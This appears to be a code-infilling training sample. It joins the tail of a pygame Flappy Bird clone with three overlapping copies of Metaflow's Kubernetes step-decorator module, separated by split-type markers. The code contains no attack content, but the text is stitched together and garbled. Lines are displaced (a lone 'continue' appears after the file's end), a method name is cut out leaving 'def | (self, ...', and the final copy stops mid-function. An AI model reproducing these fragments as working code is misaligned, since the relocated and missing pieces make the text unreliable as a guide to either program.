# stop at the top/bottom
if self.rect.top < 0:
self.rect.top = 0
self.speed_y = 0
if self.rect.bottom > HEIGHT-50:
self.rect.bottom = HEIGHT-50
self.speed_y = 0
def move(self):
# player hit SPACEBAR
if not self.alive:
return
self.speed_y -= FLAP_SPEED
self.flap_snd.play()
class Pipe(pygame.sprite.Sprite):
# pipe segment class
speed_x = -PIPE_SPEED
width = 36
def __init__(self, loc, y):
# loc = upper or lower
# y = where to place it
pygame.sprite.Sprite.__init__(self)
sprite_sheet = SpriteSheet(path.join(img_dir, "pipes.png"))
if loc == 'u':
self.image = sprite_sheet.get_image(2, 8, 52, 320)
else:
self.image = sprite_sheet.get_image(58, 8, 52, 320)
self.image.set_colorkey(BLACK)
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start offscreen to the right
self.rect.x = WIDTH + 50
if loc == 'u':
self.rect.bottom = y
else:
self.rect.top = y
# has the bird passed this pipe?
self.passed = False
def update(self):
# move
self.rect.x += self.speed_x
def offscreen(self):
# test to see if the pipe has moved offscreen
if self.rect.right < 0:
return True
else:
return False
def new_pipe():
# create a new pair of pipes (upper and lower)
y = random.randrange(30, HEIGHT-50-GAP)
pipe_u = Pipe('u', y)
pipe_l = Pipe('l', y + GAP)
return pipe_u, pipe_l
def draw_background():
# draw the background (tiled)
background_rect.bottom = HEIGHT + 20
background_rect.left = 0
screen.blit(background, background_rect)
if background_rect.width < WIDTH:
background_rect.left = background_rect.width
screen.blit(background, background_rect)
def draw_ground():
# draw the ground tiles, moving at the same speed as pipes
for image in ground_list:
image.x -= PIPE_SPEED
if image.right <= 0:
# if the image has completely moved off the screen, move it to the right
image.left = 2 * ground.get_width() + image.right
screen.blit(ground, image)
def draw_text(text, size, x, y):
# utility function to draw text at a given location
font_name = pygame.font.match_font('arial')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
screen.blit(text_surface, text_rect)
def show_go_image():
go_rect.midtop = (WIDTH/2, HEIGHT/2)
screen.blit(go_image, go_rect)
def show_ready_image():
ready_rect.midtop = (WIDTH/2, HEIGHT*2/3)
screen.blit(ready_image, ready_rect)
def load_score_images():
sprite_sheet = SpriteSheet(path.join(img_dir, 'numbers.png'))
score_images = []
image = sprite_sheet.get_image(114, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(114, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 45, 24, 36)
score_images.append(image)
return score_images
def show_score(score):
# show the score using the score images
# draw_text(str(int(score)), 22, WIDTH/2, 10)
digits = [int(c) for c in str(score)]
for i, digit in enumerate(digits):
img = score_images[digit]
img_rect = img.get_rect()
img_rect.y = 5
img_rect.x = i * img_rect.width + 5
screen.blit(img, img_rect)
# initialize pygame
pygame.init()
# initialize sound
pygame.mixer.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Flap")
try:
pygame.mixer.music.load(path.join(snd_dir, "Choro_bavario_loop.ogg"))
pygame.mixer.music.set_volume(0.5)
pygame.mixer.music.play(loops=-1)
except:
print("Can't load music.")
# background
background = pygame.image.load(path.join(img_dir, "background.png")).convert()
background_rect = background.get_rect()
background_rect.bottom = HEIGHT
background_rect.left = 0
# load some other images we need
go_image = pygame.image.load(path.join(img_dir, "gameover.png")).convert()
go_image.set_colorkey(BLACK)
go_rect = go_image.get_rect()
ready_image = pygame.image.load(path.join(img_dir, "getready.png")).convert()
ready_image.set_colorkey(BLACK)
ready_rect = ready_image.get_rect()
score_images = load_score_images()
# load the ground tile images
ground_list = []
ground = pygame.image.load(path.join(img_dir, "ground.png")).convert()
# three tiles (increase for v. large screen sizes)
for i in range(3):
image_rect = ground.get_rect()
image_rect.y = HEIGHT-50
image_rect.x = i * ground.get_width()
ground_list.append(image_rect)
while True:
clock = pygame.time.Clock()
# timer to generate new pipes
pygame.time.set_timer(pygame.USEREVENT+1, int(FREQ*1000))
# groups to hold sprites (all sprites & a group of just the pipes)
active_sprite_list = pygame.sprite.Group()
pipe_sprite_list = pygame.sprite.Group()
# create the player object
player = Bird()
active_sprite_list.add(player)
gravity = 0
score = 0
running = True
clicked = False
while running:
clock.tick(FPS)
if clicked:
gravity = GRAVITY
# check for events
for event in pygame.event.get():
# this one checks for the window being closed
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
# # every FREQ seconds, make a new pipe
elif event.type == pygame.USEREVENT+1:
upper, lower = new_pipe()
active_sprite_list.add(upper)
pipe_sprite_list.add(upper)
active_sprite_list.add(lower)
pipe_sprite_list.add(lower)
if not clicked:
clicked = True
# now check for keypresses
elif event.type == pygame.KEYDOWN:
clicked = True
# this one quits if the player presses Esc
if event.key == pygame.K_ESCAPE:
pygame.quit()
sys.exit()
if event.key == pygame.K_SPACE:
player.move()
elif event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
player.move()
##### Game logic goes here #########
# filter out old pipes
for pipe in pipe_sprite_list:
if pipe.offscreen():
active_sprite_list.remove(pipe)
pipe_sprite_list.remove(pipe)
elif pipe.rect.right < player.rect.x and not pipe.passed:
# if the pipe is past the player and hasn't yet been marked
score += 0.5
pipe.passed = True
# check for collisions
hit_list = pygame.sprite.spritecollide(player, pipe_sprite_list, False,
pygame.sprite.collide_mask)
if len(hit_list) > 0:
# too bad! stop flapping and move to the left
player.alive = False
player.speed_x = -3
if player.rect.left <= 0:
# game ends when the bird goes offscreen
running = False
##### Draw/update screen #########
draw_background()
active_sprite_list.update()
active_sprite_list.draw(screen)
draw_ground()
if not player.alive:
show_go_image()
if not clicked:
show_ready_image()
show_score(int(score))
# after drawing, flip the display
pygame.display.flip() | random_line_split | |
kubernetes_decorator.py | import os
import platform
import sys
import requests
from metaflow import util
from metaflow.decorators import StepDecorator
from metaflow.exception import MetaflowException
from metaflow.metadata import MetaDatum
from metaflow.metadata.util import sync_local_metadata_to_datastore
from metaflow.metaflow_config import (
DATASTORE_LOCAL_DIR,
KUBERNETES_CONTAINER_IMAGE,
KUBERNETES_CONTAINER_REGISTRY,
KUBERNETES_GPU_VENDOR,
KUBERNETES_NAMESPACE,
KUBERNETES_NODE_SELECTOR,
KUBERNETES_SERVICE_ACCOUNT,
)
from metaflow.plugins import ResourcesDecorator
from metaflow.plugins.timeout_decorator import get_run_time_limit_for_task
from metaflow.sidecar import SidecarSubProcess
from ..aws.aws_utils import get_docker_registry
from .kubernetes import KubernetesException
try:
unicode
except NameError:
unicode = str
basestring = str
class KubernetesDecorator(StepDecorator):
"""
Step decorator to specify that this step should execute on Kubernetes.
This decorator indicates that your step should execute on Kubernetes. Note
that you can apply this decorator automatically to all steps using the
```--with kubernetes``` argument when calling run/resume. Step level
decorators within the code are overrides and will force a step to execute
on Kubernetes regardless of the ```--with``` specification.
To use, annotate your step as follows:
```
@kubernetes
@step
def my_step(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1. If @resources is
also present, the maximum value from all decorators is used
memory : int
Memory size (in MB) required for this step. Defaults to 4096. If
@resources is also present, the maximum value from all decorators is
used
disk : int
Disk size (in MB) required for this step. Defaults to 10GB. If
@resources is also present, the maximum value from all decorators is
used
image : string
Docker image to use when launching on Kubernetes. If not specified, a
default docker image mapping to the current version of Python is used
"""
name = "kubernetes"
defaults = {
"cpu": "1",
"memory": "4096",
"disk": "10240",
"image": None,
"service_account": None,
"secrets": None, # e.g., mysecret
"node_selector": None, # e.g., kubernetes.io/os=linux
"namespace": None,
"gpu": None, # value of 0 implies that the scheduled node should not have GPUs
"gpu_vendor": None,
}
package_url = None
package_sha = None
run_time_limit = None
def __init__(self, attributes=None, statically_defined=False):
super(KubernetesDecorator, self).__init__(attributes, statically_defined)
if not self.attributes["namespace"]:
self.attributes["namespace"] = KUBERNETES_NAMESPACE
if not self.attributes["service_account"]:
self.attributes["service_account"] = KUBERNETES_SERVICE_ACCOUNT
if not self.attributes["gpu_vendor"]:
self.attributes["gpu_vendor"] = KUBERNETES_GPU_VENDOR
# TODO: Handle node_selector in a better manner. Currently it is special
# cased in kubernetes_client.py
# If no docker image is explicitly specified, impute a default image.
if not self.attributes["image"]:
# If metaflow-config specifies a docker image, just use that.
if KUBERNETES_CONTAINER_IMAGE:
self.attributes["image"] = KUBERNETES_CONTAINER_IMAGE
# If metaflow-config doesn't specify a docker image, assign a
# default docker image.
else:
# Default to vanilla Python image corresponding to major.minor
# version of the Python interpreter launching the flow.
self.attributes["image"] = "python:%s.%s" % (
platform.python_version_tuple()[0],
platform.python_version_tuple()[1],
)
# Assign docker registry URL for the image.
if not get_docker_registry(self.attributes["image"]):
if KUBERNETES_CONTAINER_REGISTRY:
self.attributes["image"] = "%s/%s" % (
KUBERNETES_CONTAINER_REGISTRY.rstrip("/"),
self.attributes["image"],
)
# Refer https://github.com/Netflix/metaflow/blob/master/docs/lifecycle.png
def step_init(self, flow, graph, step, decos, environment, flow_datastore, logger):
# Executing Kubernetes jobs requires a non-local datastore.
if flow_datastore.TYPE != "s3":
raise KubernetesException(
"The *@kubernetes* decorator requires --datastore=s3 at the moment."
)
# Set internal state.
self.logger = logger
self.environment = environment
self.step = step
self.flow_datastore = flow_datastore
if any([deco.name == "batch" for deco in decos]):
raise MetaflowException(
"Step *{step}* is marked for execution both on AWS Batch and "
"Kubernetes. Please use one or the other.".format(step=step)
)
for deco in decos:
if getattr(deco, "IS_PARALLEL", False):
raise KubernetesException(
"@kubernetes does not support parallel execution currently."
)
# Set run time limit for the Kubernetes job.
self.run_time_limit = get_run_time_limit_for_task(decos)
if self.run_time_limit < 60:
raise KubernetesException(
"The timeout for step *{step}* should be at least 60 seconds for "
"execution on Kubernetes.".format(step=step)
)
for deco in decos:
if isinstance(deco, ResourcesDecorator):
for k, v in deco.attributes.items():
# TODO: Special case GPUs when they are introduced in @resources.
if k in self.attributes:
if self.defaults[k] is None:
# skip if expected value isn't an int/float
|
# We use the larger of @resources and @batch attributes
# TODO: Fix https://github.com/Netflix/metaflow/issues/467
my_val = self.attributes.get(k)
if not (my_val is None and v is None):
self.attributes[k] = str(
max(float(my_val or 0), float(v or 0))
)
# Check GPU vendor.
if self.attributes["gpu_vendor"].lower() not in ("amd", "nvidia"):
raise KubernetesException(
"GPU vendor *{}* for step *{step}* is not currently supported.".format(
self.attributes["gpu_vendor"], step=step
)
)
# CPU, Disk, and Memory values should be greater than 0.
for attr in ["cpu", "disk", "memory"]:
if not (
isinstance(self.attributes[attr], (int, unicode, basestring, float))
and float(self.attributes[attr]) > 0
):
raise KubernetesException(
"Invalid {} value *{}* for step *{step}*; it should be greater than 0".format(
attr, self.attributes[attr], step=step
)
)
if self.attributes["gpu"] is not None and not (
isinstance(self.attributes["gpu"], (int, unicode, basestring))
and float(self.attributes["gpu"]).is_integer()
):
raise KubernetesException(
"Invalid GPU value *{}* for step *{step}*; it should be an integer".format(
self.attributes["gpu"], step=step
)
)
def package_init(self, flow, step_name, environment):
try:
# Kubernetes is a soft dependency.
from kubernetes import client, config
except (NameError, ImportError):
raise KubernetesException(
"Could not import module 'kubernetes'.\n\nInstall Kubernetes "
"Python package (https://pypi.org/project/kubernetes/) first.\n"
"You can install the module by executing - "
"%s -m pip install kubernetes\n"
"or equivalent through your favorite Python package manager."
% sys.executable
)
def runtime_init(self, flow, graph, package, run_id):
# Set some more internal state.
self.flow = flow
self.graph = graph
self.package = package
self.run_id = run_id
def runtime_task_created(
self, task_datastore, task_id, split_index, input_paths, is_cloned, ubf_context
):
# To execute the Kubernetes job, the job container needs to have
# access to the code package. We store the package in the datastore
# which the pod is able to download as part of it's entrypoint.
if not is_cloned:
self._save_package_once(self.flow_datastore, self.package)
def runtime_step_cli(
self, cli_args, retry_count, max_user_code_retries, ubf_context
):
if retry_count <= max_user_code_retries:
# After all attempts to run the user code have failed, we don't need
# to execute on Kubernetes anymore. We can execute possible fallback
# code locally.
cli_args.commands = ["kubernetes", "step"]
cli_args.command_args.append(self.package_sha)
cli_args.command_args.append(self.package_url)
# --namespace is used to specify Metaflow namespace (a different
# concept from k8s namespace).
for k, v in self.attributes.items():
if k == "namespace":
cli_args.command_options["k8s_namespace"] = v
else:
cli_args.command_options[k] = v
cli_args.command_options["run-time-limit"] = self.run_time_limit
cli_args.entrypoint[0] = sys.executable
def task_pre_step(
self,
step_name,
task_datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_retries,
ubf_context,
inputs,
):
self.metadata = metadata
self.task_datastore = task_datastore
# task_pre_step may run locally if fallback is activated for @catch
# decorator. In that scenario, we skip collecting Kubernetes execution
# metadata. A rudimentary way to detect non-local execution is to
# check for the existence of METAFLOW_KUBERNETES_WORKLOAD environment
# variable.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
meta = {}
meta["kubernetes-pod-name"] = os.environ["METAFLOW_KUBERNETES_POD_NAME"]
meta["kubernetes-pod-namespace"] = os.environ[
"METAFLOW_KUBERNETES_POD_NAMESPACE"
]
meta["kubernetes-pod-id"] = os.environ["METAFLOW_KUBERNETES_POD_ID"]
meta["kubernetes-pod-service-account-name"] = os.environ[
"METAFLOW_KUBERNETES_SERVICE_ACCOUNT_NAME"
]
# Unfortunately, there doesn't seem to be any straight forward way right
# now to attach the Batch/v1 name - While we can rely on a hacky approach
# given we know that the pod name is simply a unique suffix with a hyphen
# delimiter to the Batch/v1 name - this approach will fail if the Batch/v1
# name is closer to 63 chars where the pod name will truncate the Batch/v1
# name.
# if "ARGO_WORKFLOW_NAME" not in os.environ:
# meta["kubernetes-job-name"] = os.environ[
# "METAFLOW_KUBERNETES_POD_NAME"
# ].rpartition("-")[0]
entries = [
MetaDatum(field=k, value=v, type=k, tags=[]) for k, v in meta.items()
]
# Register book-keeping metadata for debugging.
metadata.register_metadata(run_id, step_name, task_id, entries)
# Start MFLog sidecar to collect task logs.
self._save_logs_sidecar = SidecarSubProcess("save_logs_periodically")
def task_finished(
self, step_name, flow, graph, is_task_ok, retry_count, max_retries
):
# task_finished may run locally if fallback is activated for @catch
# decorator.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
# If `local` metadata is configured, we would need to copy task
# execution metadata from the AWS Batch container to user's
# local file system after the user code has finished execution.
# This happens via datastore as a communication bridge.
# TODO: There is no guarantee that task_prestep executes before
# task_finished is invoked. That will result in AttributeError:
# 'KubernetesDecorator' object has no attribute 'metadata' error.
if self.metadata.TYPE == "local":
# Note that the datastore is *always* Amazon S3 (see
# runtime_task_created function).
sync_local_metadata_to_datastore(
DATASTORE_LOCAL_DIR, self.task_datastore
)
try:
self._save_logs_sidecar.kill()
except:
# Best effort kill
pass
@classmethod
def _save_package_once(cls, flow_datastore, package):
if cls.package_url is None:
cls.package_url, cls.package_sha = flow_datastore.save_data(
[package.blob], len_hint=1
)[0]
| continue | conditional_block |
kubernetes_decorator.py | import os
import platform
import sys
import requests
from metaflow import util
from metaflow.decorators import StepDecorator
from metaflow.exception import MetaflowException
from metaflow.metadata import MetaDatum
from metaflow.metadata.util import sync_local_metadata_to_datastore
from metaflow.metaflow_config import (
DATASTORE_LOCAL_DIR,
KUBERNETES_CONTAINER_IMAGE,
KUBERNETES_CONTAINER_REGISTRY,
KUBERNETES_GPU_VENDOR,
KUBERNETES_NAMESPACE,
KUBERNETES_NODE_SELECTOR,
KUBERNETES_SERVICE_ACCOUNT,
)
from metaflow.plugins import ResourcesDecorator
from metaflow.plugins.timeout_decorator import get_run_time_limit_for_task
from metaflow.sidecar import SidecarSubProcess
from ..aws.aws_utils import get_docker_registry
from .kubernetes import KubernetesException
try:
unicode
except NameError:
unicode = str
basestring = str
class KubernetesDecorator(StepDecorator):
"""
Step decorator to specify that this step should execute on Kubernetes.
This decorator indicates that your step should execute on Kubernetes. Note
that you can apply this decorator automatically to all steps using the
```--with kubernetes``` argument when calling run/resume. Step level
decorators within the code are overrides and will force a step to execute
on Kubernetes regardless of the ```--with``` specification.
To use, annotate your step as follows:
```
@kubernetes
@step
def my_step(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1. If @resources is
also present, the maximum value from all decorators is used
memory : int
Memory size (in MB) required for this step. Defaults to 4096. If
@resources is also present, the maximum value from all decorators is
used
disk : int
Disk size (in MB) required for this step. Defaults to 10GB. If
@resources is also present, the maximum value from all decorators is
used
image : string
Docker image to use when launching on Kubernetes. If not specified, a
default docker image mapping to the current version of Python is used
"""
name = "kubernetes"
defaults = {
"cpu": "1",
"memory": "4096",
"disk": "10240",
"image": None,
"service_account": None,
"secrets": None, # e.g., mysecret
"node_selector": None, # e.g., kubernetes.io/os=linux
"namespace": None,
"gpu": None, # value of 0 implies that the scheduled node should not have GPUs
"gpu_vendor": None,
}
package_url = None
package_sha = None
run_time_limit = None
def __init__(self, attributes=None, statically_defined=False):
super(KubernetesDecorator, self).__init__(attributes, statically_defined)
if not self.attributes["namespace"]:
self.attributes["namespace"] = KUBERNETES_NAMESPACE
if not self.attributes["service_account"]:
self.attributes["service_account"] = KUBERNETES_SERVICE_ACCOUNT
if not self.attributes["gpu_vendor"]:
self.attributes["gpu_vendor"] = KUBERNETES_GPU_VENDOR
# TODO: Handle node_selector in a better manner. Currently it is special
# cased in kubernetes_client.py
# If no docker image is explicitly specified, impute a default image.
if not self.attributes["image"]:
# If metaflow-config specifies a docker image, just use that.
if KUBERNETES_CONTAINER_IMAGE:
self.attributes["image"] = KUBERNETES_CONTAINER_IMAGE
# If metaflow-config doesn't specify a docker image, assign a
# default docker image.
else:
# Default to vanilla Python image corresponding to major.minor
# version of the Python interpreter launching the flow.
self.attributes["image"] = "python:%s.%s" % (
platform.python_version_tuple()[0],
platform.python_version_tuple()[1],
)
# Assign docker registry URL for the image.
if not get_docker_registry(self.attributes["image"]):
if KUBERNETES_CONTAINER_REGISTRY:
self.attributes["image"] = "%s/%s" % (
KUBERNETES_CONTAINER_REGISTRY.rstrip("/"),
self.attributes["image"],
)
# Refer https://github.com/Netflix/metaflow/blob/master/docs/lifecycle.png
def step_init(self, flow, graph, step, decos, environment, flow_datastore, logger):
# Executing Kubernetes jobs requires a non-local datastore.
if flow_datastore.TYPE != "s3":
raise KubernetesException(
"The *@kubernetes* decorator requires --datastore=s3 at the moment."
)
# Set internal state.
self.logger = logger
self.environment = environment
self.step = step
self.flow_datastore = flow_datastore
if any([deco.name == "batch" for deco in decos]):
raise MetaflowException(
"Step *{step}* is marked for execution both on AWS Batch and "
"Kubernetes. Please use one or the other.".format(step=step)
)
for deco in decos:
if getattr(deco, "IS_PARALLEL", False):
raise KubernetesException(
"@kubernetes does not support parallel execution currently."
)
# Set run time limit for the Kubernetes job.
self.run_time_limit = get_run_time_limit_for_task(decos)
if self.run_time_limit < 60:
raise KubernetesException(
"The timeout for step *{step}* should be at least 60 seconds for "
"execution on Kubernetes.".format(step=step)
)
for deco in decos:
if isinstance(deco, ResourcesDecorator):
for k, v in deco.attributes.items():
# TODO: Special case GPUs when they are introduced in @resources.
if k in self.attributes:
if self.defaults[k] is None:
# skip if expected value isn't an int/float
continue
# We use the larger of @resources and @batch attributes
# TODO: Fix https://github.com/Netflix/metaflow/issues/467
my_val = self.attributes.get(k)
if not (my_val is None and v is None):
self.attributes[k] = str(
max(float(my_val or 0), float(v or 0))
)
# Check GPU vendor.
if self.attributes["gpu_vendor"].lower() not in ("amd", "nvidia"):
raise KubernetesException(
"GPU vendor *{}* for step *{step}* is not currently supported.".format(
self.attributes["gpu_vendor"], step=step
)
)
# CPU, Disk, and Memory values should be greater than 0.
for attr in ["cpu", "disk", "memory"]:
if not (
isinstance(self.attributes[attr], (int, unicode, basestring, float))
and float(self.attributes[attr]) > 0
):
raise KubernetesException(
"Invalid {} value *{}* for step *{step}*; it should be greater than 0".format(
attr, self.attributes[attr], step=step
)
)
if self.attributes["gpu"] is not None and not (
isinstance(self.attributes["gpu"], (int, unicode, basestring))
and float(self.attributes["gpu"]).is_integer()
):
raise KubernetesException(
"Invalid GPU value *{}* for step *{step}*; it should be an integer".format(
self.attributes["gpu"], step=step
)
)
def package_init(self, flow, step_name, environment):
try:
# Kubernetes is a soft dependency.
from kubernetes import client, config
except (NameError, ImportError):
raise KubernetesException(
"Could not import module 'kubernetes'.\n\nInstall Kubernetes "
"Python package (https://pypi.org/project/kubernetes/) first.\n"
"You can install the module by executing - "
"%s -m pip install kubernetes\n"
"or equivalent through your favorite Python package manager."
% sys.executable
)
def runtime_init(self, flow, graph, package, run_id):
# Set some more internal state.
self.flow = flow
self.graph = graph
self.package = package
self.run_id = run_id
def runtime_task_created(
self, task_datastore, task_id, split_index, input_paths, is_cloned, ubf_context
):
# To execute the Kubernetes job, the job container needs to have
# access to the code package. We store the package in the datastore
# which the pod is able to download as part of it's entrypoint.
if not is_cloned:
self._save_package_once(self.flow_datastore, self.package)
def runtime_step_cli(
self, cli_args, retry_count, max_user_code_retries, ubf_context
):
if retry_count <= max_user_code_retries:
# After all attempts to run the user code have failed, we don't need
# to execute on Kubernetes anymore. We can execute possible fallback
# code locally.
cli_args.commands = ["kubernetes", "step"]
cli_args.command_args.append(self.package_sha)
cli_args.command_args.append(self.package_url)
# --namespace is used to specify Metaflow namespace (a different
# concept from k8s namespace).
for k, v in self.attributes.items():
if k == "namespace":
cli_args.command_options["k8s_namespace"] = v
else:
cli_args.command_options[k] = v
cli_args.command_options["run-time-limit"] = self.run_time_limit
cli_args.entrypoint[0] = sys.executable
def task_pre_step(
self,
step_name,
task_datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_retries,
ubf_context,
inputs,
):
self.metadata = metadata
self.task_datastore = task_datastore
# task_pre_step may run locally if fallback is activated for @catch
# decorator. In that scenario, we skip collecting Kubernetes execution
# metadata. A rudimentary way to detect non-local execution is to
# check for the existence of METAFLOW_KUBERNETES_WORKLOAD environment | meta["kubernetes-pod-name"] = os.environ["METAFLOW_KUBERNETES_POD_NAME"]
meta["kubernetes-pod-namespace"] = os.environ[
"METAFLOW_KUBERNETES_POD_NAMESPACE"
]
meta["kubernetes-pod-id"] = os.environ["METAFLOW_KUBERNETES_POD_ID"]
meta["kubernetes-pod-service-account-name"] = os.environ[
"METAFLOW_KUBERNETES_SERVICE_ACCOUNT_NAME"
]
# Unfortunately, there doesn't seem to be any straight forward way right
# now to attach the Batch/v1 name - While we can rely on a hacky approach
# given we know that the pod name is simply a unique suffix with a hyphen
# delimiter to the Batch/v1 name - this approach will fail if the Batch/v1
# name is closer to 63 chars where the pod name will truncate the Batch/v1
# name.
# if "ARGO_WORKFLOW_NAME" not in os.environ:
# meta["kubernetes-job-name"] = os.environ[
# "METAFLOW_KUBERNETES_POD_NAME"
# ].rpartition("-")[0]
entries = [
MetaDatum(field=k, value=v, type=k, tags=[]) for k, v in meta.items()
]
# Register book-keeping metadata for debugging.
metadata.register_metadata(run_id, step_name, task_id, entries)
# Start MFLog sidecar to collect task logs.
self._save_logs_sidecar = SidecarSubProcess("save_logs_periodically")
def task_finished(
self, step_name, flow, graph, is_task_ok, retry_count, max_retries
):
# task_finished may run locally if fallback is activated for @catch
# decorator.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
# If `local` metadata is configured, we would need to copy task
# execution metadata from the AWS Batch container to user's
# local file system after the user code has finished execution.
# This happens via datastore as a communication bridge.
# TODO: There is no guarantee that task_prestep executes before
# task_finished is invoked. That will result in AttributeError:
# 'KubernetesDecorator' object has no attribute 'metadata' error.
if self.metadata.TYPE == "local":
# Note that the datastore is *always* Amazon S3 (see
# runtime_task_created function).
sync_local_metadata_to_datastore(
DATASTORE_LOCAL_DIR, self.task_datastore
)
try:
self._save_logs_sidecar.kill()
except:
# Best effort kill
pass
@classmethod
def _save_package_once(cls, flow_datastore, package):
if cls.package_url is None:
cls.package_url, cls.package_sha = flow_datastore.save_data(
[package.blob], len_hint=1
)[0] | # variable.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
meta = {} | random_line_split |
kubernetes_decorator.py | import os
import platform
import sys
import requests
from metaflow import util
from metaflow.decorators import StepDecorator
from metaflow.exception import MetaflowException
from metaflow.metadata import MetaDatum
from metaflow.metadata.util import sync_local_metadata_to_datastore
from metaflow.metaflow_config import (
DATASTORE_LOCAL_DIR,
KUBERNETES_CONTAINER_IMAGE,
KUBERNETES_CONTAINER_REGISTRY,
KUBERNETES_GPU_VENDOR,
KUBERNETES_NAMESPACE,
KUBERNETES_NODE_SELECTOR,
KUBERNETES_SERVICE_ACCOUNT,
)
from metaflow.plugins import ResourcesDecorator
from metaflow.plugins.timeout_decorator import get_run_time_limit_for_task
from metaflow.sidecar import SidecarSubProcess
from ..aws.aws_utils import get_docker_registry
from .kubernetes import KubernetesException
try:
unicode
except NameError:
unicode = str
basestring = str
class KubernetesDecorator(StepDecorator):
"""
Step decorator to specify that this step should execute on Kubernetes.
This decorator indicates that your step should execute on Kubernetes. Note
that you can apply this decorator automatically to all steps using the
```--with kubernetes``` argument when calling run/resume. Step level
decorators within the code are overrides and will force a step to execute
on Kubernetes regardless of the ```--with``` specification.
To use, annotate your step as follows:
```
@kubernetes
@step
def my_step(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1. If @resources is
also present, the maximum value from all decorators is used
memory : int
Memory size (in MB) required for this step. Defaults to 4096. If
@resources is also present, the maximum value from all decorators is
used
disk : int
Disk size (in MB) required for this step. Defaults to 10GB. If
@resources is also present, the maximum value from all decorators is
used
image : string
Docker image to use when launching on Kubernetes. If not specified, a
default docker image mapping to the current version of Python is used
"""
name = "kubernetes"
defaults = {
"cpu": "1",
"memory": "4096",
"disk": "10240",
"image": None,
"service_account": None,
"secrets": None, # e.g., mysecret
"node_selector": None, # e.g., kubernetes.io/os=linux
"namespace": None,
"gpu": None, # value of 0 implies that the scheduled node should not have GPUs
"gpu_vendor": None,
}
package_url = None
package_sha = None
run_time_limit = None
def __init__(self, attributes=None, statically_defined=False):
super(KubernetesDecorator, self).__init__(attributes, statically_defined)
if not self.attributes["namespace"]:
self.attributes["namespace"] = KUBERNETES_NAMESPACE
if not self.attributes["service_account"]:
self.attributes["service_account"] = KUBERNETES_SERVICE_ACCOUNT
if not self.attributes["gpu_vendor"]:
self.attributes["gpu_vendor"] = KUBERNETES_GPU_VENDOR
# TODO: Handle node_selector in a better manner. Currently it is special
# cased in kubernetes_client.py
# If no docker image is explicitly specified, impute a default image.
if not self.attributes["image"]:
# If metaflow-config specifies a docker image, just use that.
if KUBERNETES_CONTAINER_IMAGE:
self.attributes["image"] = KUBERNETES_CONTAINER_IMAGE
# If metaflow-config doesn't specify a docker image, assign a
# default docker image.
else:
# Default to vanilla Python image corresponding to major.minor
# version of the Python interpreter launching the flow.
self.attributes["image"] = "python:%s.%s" % (
platform.python_version_tuple()[0],
platform.python_version_tuple()[1],
)
# Assign docker registry URL for the image.
if not get_docker_registry(self.attributes["image"]):
if KUBERNETES_CONTAINER_REGISTRY:
self.attributes["image"] = "%s/%s" % (
KUBERNETES_CONTAINER_REGISTRY.rstrip("/"),
self.attributes["image"],
)
# Refer https://github.com/Netflix/metaflow/blob/master/docs/lifecycle.png
def | (self, flow, graph, step, decos, environment, flow_datastore, logger):
# Executing Kubernetes jobs requires a non-local datastore.
if flow_datastore.TYPE != "s3":
raise KubernetesException(
"The *@kubernetes* decorator requires --datastore=s3 at the moment."
)
# Set internal state.
self.logger = logger
self.environment = environment
self.step = step
self.flow_datastore = flow_datastore
if any([deco.name == "batch" for deco in decos]):
raise MetaflowException(
"Step *{step}* is marked for execution both on AWS Batch and "
"Kubernetes. Please use one or the other.".format(step=step)
)
for deco in decos:
if getattr(deco, "IS_PARALLEL", False):
raise KubernetesException(
"@kubernetes does not support parallel execution currently."
)
# Set run time limit for the Kubernetes job.
self.run_time_limit = get_run_time_limit_for_task(decos)
if self.run_time_limit < 60:
raise KubernetesException(
"The timeout for step *{step}* should be at least 60 seconds for "
"execution on Kubernetes.".format(step=step)
)
for deco in decos:
if isinstance(deco, ResourcesDecorator):
for k, v in deco.attributes.items():
# TODO: Special case GPUs when they are introduced in @resources.
if k in self.attributes:
if self.defaults[k] is None:
# skip if expected value isn't an int/float
continue
# We use the larger of @resources and @batch attributes
# TODO: Fix https://github.com/Netflix/metaflow/issues/467
my_val = self.attributes.get(k)
if not (my_val is None and v is None):
self.attributes[k] = str(
max(float(my_val or 0), float(v or 0))
)
# Check GPU vendor.
if self.attributes["gpu_vendor"].lower() not in ("amd", "nvidia"):
raise KubernetesException(
"GPU vendor *{}* for step *{step}* is not currently supported.".format(
self.attributes["gpu_vendor"], step=step
)
)
# CPU, Disk, and Memory values should be greater than 0.
for attr in ["cpu", "disk", "memory"]:
if not (
isinstance(self.attributes[attr], (int, unicode, basestring, float))
and float(self.attributes[attr]) > 0
):
raise KubernetesException(
"Invalid {} value *{}* for step *{step}*; it should be greater than 0".format(
attr, self.attributes[attr], step=step
)
)
if self.attributes["gpu"] is not None and not (
isinstance(self.attributes["gpu"], (int, unicode, basestring))
and float(self.attributes["gpu"]).is_integer()
):
raise KubernetesException(
"Invalid GPU value *{}* for step *{step}*; it should be an integer".format(
self.attributes["gpu"], step=step
)
)
def package_init(self, flow, step_name, environment):
try:
# Kubernetes is a soft dependency.
from kubernetes import client, config
except (NameError, ImportError):
